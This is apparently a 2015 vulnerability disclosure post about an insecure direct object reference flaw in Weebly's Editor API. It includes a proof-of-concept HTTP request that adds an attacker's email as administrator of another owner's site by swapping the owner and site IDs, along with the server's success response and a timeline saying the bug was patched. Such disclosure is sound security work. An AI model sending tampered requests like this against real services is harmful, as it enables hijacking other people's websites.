Title: Hijack any website from weebly.com by just adding an administrator to their website. [Insecure Direct Object Reference Vulnerability]

=====

Weebly is a web-hosting service that allows the user to ?drag-and-drop? while using their website builder. As of August 2012, Weebly hosts over 20 million sites with a monthly rate of over 1 million unique visitors. ?http://en.wikipedia.org/wiki/Weebly?.

Website: https://www.weebly.com

Any weebly website owner can hijack any weebly website by just inviting himself/herself through email and modifying the site ID in HTTP Request.

=====

PoC:
Video:
https://www.youtube.com/watch?v=ovM-wliY7lE

Written:

Here's the website details of the target:

weebly site: ohhyeahphfudge.weebly.com
owner_id: 47812623
site_id: 367503762921888574

=====

HTTP Request:

POST /api/JsonRPC/Editor/ HTTP/1.1
Host: www.weebly.com

{"jsonrpc":"2.0","method":"Contributor::createMultiple","params":[{"role
":"admin","email":"huehuehuehue10+weebly (at) gmail (dot) com [email concealed]","message":"HiJacking
Weebly websites","restrict_pages":false,"owner_id":"47812623","site_id":"367503
762921888574"}],"id":0}

=====

HTTP Response:

HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26

{"jsonrpc":"2.0","id":0,"method":"Contributor::createMultiple","result":
{"success":true,"models":[{"id":"invitation-596276730608950492","pending
":true,"owner_id":"47812623","user_id":null,"site_id":"36750376292188857
4","email":"huehuehuehue10+weebly (at) gmail (dot) com [email concealed]","last_login":false,"role":"
admin","display_role":"Administrator","invitation_id":"59627673060895049
2","invitation_used":null,"invitation_retracted":null,"message":"HiJacki
ng Weebly websites","restrict_pages":false,"allowed_pages":[],"allow_publish":true
,"allow_stats":true,"allow_form_entries":true,"allow_blog_comments":true
}],"errors":[]}}

=====

Report Timeline:
February 22, 2015 ? Bug Found by Allan Jay Dumanhug.
February 26, 2015 ? Vendor Response and Vendor Fix/Patch.

[ reply ]